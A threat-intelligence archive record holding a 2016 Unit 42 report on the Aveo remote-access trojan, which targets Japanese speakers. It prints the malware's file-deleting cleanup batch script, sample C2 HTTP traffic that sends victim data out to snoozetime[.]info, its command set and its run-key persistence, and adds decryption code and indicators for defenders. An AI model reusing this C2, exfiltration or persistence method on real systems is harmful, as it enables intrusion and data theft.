{
	"id": "4bcbea2d-a549-429f-aca6-596b82838a6e",
	"created_at": "2026-04-06T00:06:53.563046Z",
	"updated_at": "2026-04-10T03:22:08.611989Z",
	"deleted_at": null,
	"sha1_hash": "4e24aeb400f525f33527951ef3317bc769c1cf5c",
	"title": "Aveo Malware Family Targets Japanese Speaking Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 486992,
	"plain_text": "Aveo Malware Family Targets Japanese Speaking Users\r\nBy Josh Grunzweig, Robert Falcone\r\nPublished: 2016-08-16 · Archived: 2026-04-05 22:46:50 UTC\r\nPalo Alto Networks has identified a malware family known as ‘Aveo’ that is being used to target Japanese speaking users. The ‘Aveo’ malware name comes from an embedded debug string within the binary file. The Aveo malware family has close ties to the previously discussed FormerFirstRAT malware family, which was also witnessed being used against Japanese targets. Aveo is disguised as a Microsoft Excel document, and drops a decoy document upon execution. The decoy document in question is related to a research initiative led by the Ido Laboratory at the Saitama Institute of Technology. Upon execution, the Aveo malware accepts a number of commands, allowing attackers to take full control over the victim machine.\r\nDeployment\r\nThe Aveo malware sample disguises itself as a Microsoft Excel document, as the icon below demonstrates. Note that the filename of ‘malware.exe’ is simply a placeholder, as the original filename is unknown.\r\nFigure 1 Microsoft Excel icon used by Aveo malware\r\nThe executable is in fact a WinRAR self-extracting executable file, which will drop the decoy document and Aveo Trojan upon execution. The following decoy document is dropped and subsequently opened when run.\r\nFigure 2 Decoy document used with Aveo malware\r\nhttp://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/\r\nPage 1 of 6\n\nThis decoy document is hosted on the Ido Laboratory and contains information about a 2016 research initiative. The document lists participants in the 16th CAVE workshop, including names, affiliations, and email addresses of those involved. The document, written in Japanese, as well as the filename of this document, “CAVE研究会参加者.xls”, indicates that this malware was used to target one or more Japanese speaking individuals. Additionally, the similarities between the Aveo and FormerFirstRAT malware families, which will be discussed later in the post, further add evidence that Japanese speakers are being targeted.\r\nInfrastructure\r\nThe Aveo Trojan is configured to communicate with the following domain name over HTTP.\r\nsnoozetime[.]info\r\nThis domain was first registered in May 2015 to ‘jack.ondo@mail.com’. Since that time, it has been associated with the following three IP addresses:\r\n104.202.173[.]82\r\n107.180.36[.]179\r\n50.63.202[.]38\r\nAll IP addresses in question are located within the United States.\r\nFigure 3 PassiveTotal screenshot showing associated IP addresses with snoozetime[.]info\r\nThe WHOIS information for snoozetime[.]info lists a registrant email address of ‘jack.ondo@mail[.]com’ and a name of ‘aygt5ruhrj aygt5ruhrj gerhjrt’. Pivoting off of these two pieces of information to domains that share them yields the following additional domains and email addresses.\r\nbluepaint[.]info\r\ncoinpack[.]info\r\n7b7p[.]info\r\ndonkeyhaws[.]info\r\neuropcubit[.]com\r\njhmiyh.ny@gmail[.]com\r\n844148030@qq[.]com\r\nMalware Analysis\r\nAfter running the self-extracting executable, a number of files are dropped to the file system and the following execution flow is witnessed:\r\nFigure 4 Malware execution flow\r\nWhen the mshelp32.exe executable runs, it begins by reading in the setting32.ini file, which contains the name of the decoy document. This information is used to build a batch script, such as the following.\r\n@echo off\r\ncopy \"CAVE研究会参加者.xls\" \"C:\\Documents and Settings\\Administrator\\Desktop\\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls\" /Y\r\ndel \"CAVE研究会参加者.xls\" /F /Q\r\ndel mshelp32.exe /F /Q\r\ndel setting32.ini /F /Q\r\ndel \"C:\\Documents and Settings\\Administrator\\Desktop\\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe\" /F /Q\r\ndel %0 /F /Q\r\nThis batch script is executed within a new process, and acts as a simple cleanup script that runs after Aveo and the decoy document are executed.\r\nAveo Malware Family\r\nThe Aveo malware initially runs an install routine, which will copy itself to the following location:\r\n%APPDATA%\\MMC\\MMC.exe\r\nIf for any reason the %APPDATA%\\MMC directory cannot be created, Aveo will use %TEMP% instead of %APPDATA%.\r\nAfter the malware copies itself, it will execute MMC.exe in a new process with an argument of the original filename. When executed, if this single argument is provided, the malware will delete the file path provided.\r\nAfter the installation routine completes, Aveo will exfiltrate the following victim information to a remote server via HTTP.\r\nUnique victim hash\r\nIP Address\r\nMicrosoft Windows version\r\nUsername\r\nANSI code page identifier\r\nThis information is exfiltrated to the ‘snoozetime[.]info’ domain, as seen in the following example HTTP request:\r\nGET /index.php?id=35467\u00261=ySxlp03YGm0-\u00262=yiFi6hjbFHf9UtL44RPQ\u00264=zTZh6h7bHGjiUMzn\u00265=sXcjrAmqXiyiGJWzuUQ-\u00266=yipl9g-- HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: snoozetime[.]info\r\nCache-Control: no-cache\r\nTo encrypt the provided data, the malware makes use of the RC4 algorithm, using a key of ‘hello’. As shown in the following image, the encryption routines between Aveo and FormerFirstRAT are almost identical, with only the algorithms and keys being changed.\r\nFigure 5 Comparison of encryption function between Aveo and FormerFirstRAT\r\nIn order to decrypt the data provided via HTTP, the following code may be used:\r\nimport base64\r\nfrom wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt\r\n\r\n# Windows CryptoAPI algorithm identifiers used by the malware\r\nCALG_RC4 = 0x6801\r\nCALG_MD5 = 0x8003\r\n\r\ndef decrypt(data):\r\n    # Mirror the malware: derive the RC4 key from the MD5 hash of the key string 'hello'\r\n    md5_hasher = CryptCreateHash(CALG_MD5)\r\n    CryptHashData(md5_hasher, b'hello')\r\n    generated_key = CryptDeriveKey(md5_hasher, CALG_RC4)\r\n    return CryptDecrypt(generated_key, data)\r\n\r\n# Every query parameter after 'id' is an RC4-encrypted, base64-encoded value\r\nfor a in 'index.php?id=35467\u00261=niBo9x/bFG4-\u00262=yi9i6hjbAmD5TNPu5A--\u00264=zTZh6h7bHGjiUMzn\u00265=sXcjrAmqXiyiGJWzuUQ-\u00266=yipl9g--'.split(\"\u0026\")[1:]:\r\n    k, v = a.split(\"=\")\r\n    # The malware replaces the base64 padding character '=' with '-'\r\n    decrypted = decrypt(base64.b64decode(v.replace(\"-\", \"=\")))\r\n    print(\"[+] Parameter {} Decrypted: {}\".format(k, decrypted.decode()))\r\nRunning the code above yields the following results:\r\n[+] Parameter 1 Decrypted: e8836687\r\n[+] Parameter 2 Decrypted: 172.16.95.184\r\n[+] Parameter 4 Decrypted: 6.1.7601.2.1\r\n[+] Parameter 5 Decrypted: Josh Grunzweig\r\n[+] Parameter 6 Decrypted: 1252\r\nAfter the initial victim information is exfiltrated, the malware expects a response of ‘OK’. Afterwards, Aveo will spawn a new thread that is responsible for handling interactive command requests received from the command and control (C2) server, as well as requests to spawn an interactive shell.\r\nAveo proceeds to set the following registry key to point towards the malware’s path, thus ensuring persistence across reboots:\r\nHKCU\\software\\microsoft\\windows\\currentversion\\run\\msnetbridge\r\nA command handler loop is then entered, where Aveo will accept commands from the remote C2. While the Aveo malware family awaits a response, it will perform sleep delays of randomly chosen intervals between 0 and 3276 milliseconds. Should the C2 server respond with ‘toyota’, it will set that interval to 60 seconds. Aveo accepts the following commands, shown with their associated function.\r\n1 : Execute command in interactive shell\r\n2 : Get file attributes\r\n3 : Write file\r\n4 : Read file\r\n5 : List drives\r\n6 : Execute DIR command against path\r\nThe following example request demonstrates the C2 server sending the ‘ipconfig’ command to the Aveo malware.\r\nC2 Request\r\nGET /index.php?id=35468\u00261=niBo9x/bFG4- HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: snoozetime[.]info\r\nCache-Control: no-cache\r\nHTTP/1.0 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 11\r\nServer: Werkzeug/0.11.10 Python/2.7.5\r\nDate: Wed, 10 Aug 2016 16:00:11 GMT\r\n\\xca89\\xb4J\\x82B?\\xa5\\x05\\xe8\r\n[Decrypted]\r\n1 ipconfig\r\nAveo Response\r\nPOST /index.php?id=35469\u00261=niBo9x/bFG4- HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\nHost: snoozetime[.]info\r\nContent-Length: 1006\r\nCache-Control: no-cache\r\n\\xca\\x38\\x39\\xb4\\x4a\\x82\\x42\\x3f\\xa5\\x05\\xe8\\xdb\\xda\\x74\\x8b\\x79\\x39\\x46\\xf2\\x42\\x1f\\xcd\\x39\\xf3\\x65\\x1d\\xda\\x49\\x40\\x6c\\x5e\\x6e\\xab\\x7\r\n[Truncated]\r\n[Decrypted]\r\n1 ipconfig\r\nWindows IP Configuration\r\nEthernet adapter Bluetooth Network Connection:\r\n   Media State . . . . . . . . . . . : Media disconnected\r\n   Connection-specific DNS Suffix  . :\r\n[Truncated]\r\nConclusion\r\nAveo shares a number of characteristics with FormerFirstRAT, including encryption routines, code reuse, and similarities in C2 functionality. Aveo is far from the most sophisticated malware family around. As witnessed in the previously discussed FormerFirstRAT sample, this related malware family also looks to be targeting Japanese speaking users. Using a self-extracting WinRAR file, the malware drops a decoy document, a copy of the Aveo malware, and a cleanup script.\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nAn AutoFocus tag has been created to track and monitor this threat\r\nWildFire classifies Aveo samples as malicious\r\nC2 domains listed in this report are blocked through Threat Prevention.\r\nIndicators of Compromise\r\nSHA256 Hashes\r\n9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2\r\n8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d\r\nC2 Domains\r\nsnoozetime[.]info\r\nRegistry Keys\r\nHKCU\\software\\microsoft\\windows\\currentversion\\run\\msnetbridge\r\nFile Paths\r\n%APPDATA%\\MMC\\MMC.exe\r\n%TEMP%\\MMC\\MMC.exe\r\nSource: http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/"
	],
	"report_names": [
		"unit42-aveo-malware-family-targets-japanese-speaking-users"
	],
	"threat_actors": [],
	"ts_created_at": 1775434013,
	"ts_updated_at": 1775791328,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e24aeb400f525f33527951ef3317bc769c1cf5c.pdf",
		"text": "https://archive.orkl.eu/4e24aeb400f525f33527951ef3317bc769c1cf5c.txt",
		"img": "https://archive.orkl.eu/4e24aeb400f525f33527951ef3317bc769c1cf5c.jpg"
	}
}